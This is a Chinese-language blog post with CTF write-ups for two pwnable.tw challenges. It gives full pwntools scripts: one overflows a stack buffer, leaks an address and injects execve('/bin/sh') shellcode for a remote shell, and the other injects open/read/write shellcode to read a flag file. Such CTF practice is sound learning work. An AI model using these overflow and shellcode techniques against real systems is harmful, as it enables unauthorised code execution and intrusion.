Pwnable.tw 小练习

练习一下pwn……要成为和坤坤一样的多元化选手……

start

这个题我们先逆向一下,发现输入20个字符加个回车就会覆盖掉esp,那么我们就操作一波,用pwntools进行交互,注意代码中间有一个细节是把地址传到了rcx上面,我们把rcx输出就拿到了esp地址,然后我们编个码传上去就行了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
from pwn import *

address = "chall.pwnable.tw"
port = 10000

shellcode = b"\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
gad = 0x8048087
print(p32(gad))

console = remote(address,port)
print(console.recv())
payload = ('a' * 20).encode('utf-8') + p32(gad)
console.send(payload)
leak = u32(console.recv(4))
print(hex(leak))
payload = ('a' * 20).encode('utf-8') + p32(leak + 0x18) + b'\x90' * 4 + shellcode
console.send(payload)
console.interactive('root@start# ')

orw

IDA逆向一波,观察一下
main函数入口在0x08048548,在这个地方下断点
单步跟踪,发现中间把我的输入的值放在了eax对应的地址中,然后直接call
那么我们只需要构造一个shellcode直接读取文件就可以了
那么我们找个教程题解就学会了
http://syscalls.kernelgrok.com/

1
2
3
4
5
6
7
8
9
10
11
12
13
14
from pwn import *

address = "chall.pwnable.tw"
port = 10001
open_shellcode = "xor ecx,ecx;xor edx,edx;mov eax,0x5;push 0x00006761;push 0x6c662f77;push 0x726f2f65;push 0x6d6f682f;mov ebx,esp;int 0x80;"
read_shellcode = "mov eax,0x3;mov ecx,ebx;mov ebx,0x3;mov edx,0x40;int 0x80;"
write_shellcode = "mov eax,0x4;mov ebx,0x1;mov edx,0x40;int 0x80;"
shellcode = open_shellcode + read_shellcode + write_shellcode
payload = asm(shellcode)
io = remote(address,port)
io.recvuntil("shellcode:")
io.sendline(payload)
print(io.recv())
io.interactive('root@orw# ')

Pwnable.tw 小练习
http://hexo.init-new-world.com/pwnable-tw-exercise
Author
John Doe
Posted on
October 26, 2019
Licensed under